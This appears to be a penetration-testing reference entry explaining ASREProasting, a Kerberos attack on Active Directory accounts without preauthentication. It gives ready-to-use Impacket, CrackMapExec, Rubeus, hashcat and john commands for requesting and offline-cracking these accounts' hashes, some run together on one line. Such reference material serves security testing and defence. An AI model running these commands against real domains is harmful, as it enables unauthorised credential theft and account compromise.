When asking the KDC (Key Distribution Center) for a TGT (Ticket Granting Ticket), the requesting user needs to send a piece of information (a timestamp) encrypted with it's own credentials. It ensures the user is requesting a TGT for himself. This is called Kerberos preauthentication.
The TGT is then sent to the user in the
KRB_AS_REP message, but that message also contains a session key. That session key is encrypted with the requested user's NT hash.
Kerberos preauthentication prevents attackers from requesting a TGT for any user, receive the
KRB_AS_REP message, extract the session key and crack it offline in an attempt to retrieve that user's password.
Because some applications don't support Kerberos preauthentication, it is common to find users with Kerberos preauthentication disabled, hence allowing attackers to request TGTs for these users and crack the session keys offline. This is ASREProasting.
# users list dynamically queried with an LDAP anonymous bindGetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'# with a users fileGetNPUsers.py -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'# users list dynamically queried with a LDAP authenticated bind (password)GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'# users list dynamically queried with a LDAP authenticated bind (NT hash)GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
This can also be achieved with CrackMapExec (Python).
crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --KdcHost $KeyDistributionCenter
The same thing can be done with Rubeus from a session running with a domain user privileges.
Rubeus.exe asreproast /format:hashcat /outfile:ASREProastables.txt
hashcat -m 18200 -a 0 ASREProastables.txt $wordlist
john --wordlist=$wordlist ASREProastables.txt